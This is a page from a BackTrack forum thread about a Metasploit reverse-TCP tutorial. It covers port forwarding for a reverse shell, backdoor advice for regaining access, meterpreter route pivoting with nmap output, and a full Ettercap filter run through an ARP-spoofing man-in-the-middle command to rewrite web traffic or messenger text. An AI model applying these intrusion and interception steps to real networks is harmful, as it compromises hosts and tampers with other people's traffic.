Page 4 of 9 FirstFirst ... 23456 ... LastLast
Results 31 to 40 of 90

Thread: Metasploiting for BT3 - Reverse TCP

  1. #31
    Member kazalku's Avatar
    Join Date
    Feb 2009


    Quote Originally Posted by phoenix910 View Post
    Glad you liked it All your methodology is correct (just make sure that you run it with administrative permissions in vista to assure that all functions are available). The only thing you'll need to do is set up port forwarding on You will need to go to the router setup page and make sure any external connection attempts to 5555 are sent to the local IP port 5555 of the BT3 box. Then all should connect fine. For specific port forwarding instructions for your router model, visit

    Marvelous!!!!!! It worked like a dream. Thank you very much. You are a star.

  2. #32


    Glad to be of help


  3. #33
    Join Date
    Jun 2008


    thank you very much phoenix910
    i have some questions:
    i read that i have to put a high port number :i put 5555 and it work perfectly
    on my LAN but when i put for example port 80-100-500...
    i have no positif response (all the payloads are used for high ports only, for
    example if i have a outgoing firewall filter for high port number what should
    i do ??)

    2)when i connect succesfully to my PC for example for a reason i have a
    disconnection between these 2 PC their is any trick to reconnect to it without
    the re-opening of the output.exe in the PC ??(without the usage of netcat)


  4. #34


    In theory, and port that isn't being used by either OS should work - however, 80 is often used, as you figured in your example. My advice would be to just modify your firewall's security settings.

    And no, unless you've installed a backdoor, there isn't any way to reconnect once you've disconnected - unless the disconnection is between you and a remote shell, and the actual metasploit session stays open; in which case, you can just re-start interaction with that particular session. But if the disconnection happens between server and client, then unless you've installed some form of backdoor (be it user account, remote shell, etc.), you won't be able to get back in without running the executable.


  5. #35
    Member kazalku's Avatar
    Join Date
    Feb 2009


    Quote Originally Posted by phoenix910 View Post
    Lets say we couldn't reach the server ( from the outside, but because we have a shell, we have a chance to exploit it. Let's add the route as stated before:
    meterpreter > ^Z
    Background session 1? [y/N] y
    msf exploit(handler) > route add 1
    msf exploit(handler) > route print

    Active Routing Table

    Subnet Netmask Gateway
    ------ ------- ------- Session 1
    Now, we simply need to execute our Nmap scan, and after that, analyse the vulnerabilities, and exploit the server the same way you would any other host. For this scan, I did something very quick and basic, but you can specify it however you like:
    msf exploit (handler) > nmap -sS -sV -T 5 -P0 -O

    In my case, is remote router... I did this:
    meterpreter > route

    Network routes

    Subnet Netmask Gateway
    ------ ------- -------

    meterpreter >
    Background session 2? [y/N]
    msf exploit(handler) > route add 2
    msf exploit(handler) > route print

    Active Routing Table

    Subnet Netmask Gateway
    ------ ------- ------- Session 2

    msf exploit(handler) > nmap -sS -sV -T 5 -P0 -O[*] exec: nmap -sS -sV -T 5 -P0 -O

    Starting Nmap 4.85BETA3 ( ) at 2009-03-11 23:25 GMT
    Interesting ports on
    Not shown: 996 filtered ports
    23/tcp open telnet?
    53/tcp open domain?
    80/tcp open http?
    5000/tcp open upnp?
    MAC Address: 00:22:3F:B5:0B0 (Netgear)
    Warning: OSScan results may be unreliable because we could not find at least 1 o pen and 1 closed port
    Device type: WAP|switch
    Running: Actiontec Linux 2.4.X, HP embedded, Linksys embedded, Netgear embedded
    OS details: HP Brocade 4100 switch; or Actiontec MI-424-WR, Linksys WRVS4400N, o r Netgear WNR834B wireless broadband router
    Network Distance: 1 hop

    OS and Service detection performed. Please report any incorrect results at http: // .
    Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
    msf exploit(handler) >
    However, 00:22:3F:B5:0B0 is router belongs to the BT3 box, NOT to the compromised vista box. Any idea what's going wrong here?

  6. #36


    You need it to be on a separate local IP range, as far as I'm aware, otherwise you'll end up scanning yourself.


  7. #37
    Member Mortifix's Avatar
    Join Date
    Nov 2006


    Wow great tutorial!! I am interested in the Ettercap portion of the article. Do you have any other guides about filters you have created using ettercap?
    I hate Google.

  8. #38


    Well, I haven't written any majorly different guides specifically on that, only another similar explanation from a previous tutorial:

    Manipulating the Packets:
    The possibilities of packet manipulation are endless, bound only by your creativity,
    and the time you are willing to spend exploring the different protocols and how they
    work and there relations with inbound traffic and outbound traffic on the network.
    Ettercap comes with its own built in filter creator, as well as a few of it's own pre-
    made packets. Building your own filter requires a basic knowledge of how
    programming languages work, or the ability to analyse and determine how the
    Ettercap filters work, which is relatively simple if you are used to analysing
    data/packet streams with programs such as Wireshark. Open a new console, and type:
    bt ~ # kedit filter.pic
    Then copy and paste the following into the window that comes up:
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("Modified Accept-Encoding!\n");
    if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img
    src=\"\" ");
    replace("IMG SRC=", "img
    src=\"\" ");
    msg("Replaced the picture.\n");
    if (ip.proto == UDP && udp.src == 80) {
    replace("img src=", "img
    src=\"\" ");
    replace("IMG SRC=", "img
    src=\"\" ");
    msg("Replaced the picture.\n");
    <-snapshot7.png-> Caption: Image Replacement in Action
    Save this, and then close Kedit. In that same console session, run the following
    command to turn the code into a filter that is readable by Ettercap:
    bt ~ # etterfilter filter.pic -o filter.ef
    You will see a few things happen, and then the filter will be created. Basically, the
    code is fairly simple. The “if (ip.proto == TCP && tcp.dst/src == 80)” basically tells
    Ettercap to only pay attention to the TCP protocol packets on either the destination to
    port 80, or the source from port 80 (which is all web related traffic), and then to
    follow the instructions that come after that – being to search that packet for a string,
    then replace it with what you would like that string to read. You will also notice that
    in replacing the strings, we must keep the length of the two strings the same – be
    careful to make sure you do this, or it won't work. Now to make this filter run during
    your MiTM attack, we must use a slightly altered Ettercap command. The command
    to use is (assuming you saved the filter in the /root folder):
    bt ~ # sudo ettercap -T -q -F filter.ef -M arp:remote /$IP/ -P autoadd
    Now move to another computer, and navigate to a website, and see a lot of pictures
    being replaced with the image you specified! This can be quite funny. Alternatively,
    you can see the images being replaced by watching the output of your console
    session. The filter we created won't work with absolutely every website because of the
    many various ways of including images, but it will work with many of them.
    Applying this same principal, you can for example figure out the port of a Messenger
    program, and modify the outgoing packets to include words of your own – for
    example replacing something like “How are you” with something like “I hate you!”
    (notice still the same amount of characters – this is essential in general packet
    manipulation, however, is not necessary in our image filter, as we are adding to what
    is already there [via the use of the slashes], not modifying). Explore, and have fun
    with this.
    But that's from one of my other Ettercap-related articles. If you want more specific stuff, take a look at the structure of that, and the packets you want to manipulate, and write your own, or Google search around a bit for other examples


  9. #39
    Just burned his ISO
    Join Date
    Oct 2008


    phoenix910 thanks for the articles you posted,great work!

  10. #40


    Quote Originally Posted by coool View Post
    nice thanx

    but i'm test this code nothing happend

    show me error
    [-] Invalid format: exe
    version MSF 3.2 and update seam problem can tell me what I can slove this problem
    Interesting, I got the same thing. Just burned the .iso a few days back off the main site. Any ideas on this? Exact same error. Thank you for the great writeup. Already learned a few new things.

Page 4 of 9 FirstFirst ... 23456 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts